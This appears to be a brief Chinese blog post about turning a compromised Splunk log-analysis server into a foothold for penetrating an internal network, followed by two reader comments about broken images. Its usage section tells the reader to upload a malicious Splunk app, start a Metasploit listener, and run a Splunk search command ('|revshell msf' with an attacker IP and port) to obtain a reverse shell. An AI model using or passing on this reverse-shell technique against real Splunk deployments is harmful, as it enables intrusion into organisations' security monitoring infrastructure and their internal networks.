这篇文章上次修改于 1721 天前,可能其部分内容已经发生变化,如有疑问可询问作者。
Splunk是一个日志、流量聚合分析工具,通常用于防御分析和基础设施管理。正日Github作者说的,虽然这些工具可以很好地发现安全事件及风险,但它们也会反过来被攻击者利用,攻陷splunk并渗透内网中,成为管理员的噩梦。
使用方法:
上传APP后,本地使用MSF监听,并在splunk中执行以下语句即可获取shell
|revshell msf <attacker IP> <attacker port>
已有 2 条评论
贵站的图片好像挂了
@知识共享网 @知识共享网:多谢提醒